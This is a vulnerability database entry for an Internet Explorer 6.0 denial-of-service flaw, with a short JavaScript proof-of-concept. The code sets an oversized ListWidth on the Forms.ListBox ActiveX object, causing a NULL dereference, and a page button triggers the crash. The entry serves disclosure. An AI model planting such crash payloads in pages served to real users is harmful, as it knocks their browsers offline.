Microsoft Internet Explorer 6.0 - Multiple Object ListWidth Property Denial of Service Vulnerability

2014-07-01T00:00:00
ID SSV:81832
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/19113/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability.

This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

function Demo() {

	// Forms.ComboBox.1 is also affected
	var a = new ActiveXObject('Forms.ListBox.1'); 

	// NULL dereference
	a.ListWidth = 0x7ffffffe;
	
	// Integer overflow exception
	// a.ListWidth = 0x7fffffff;
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>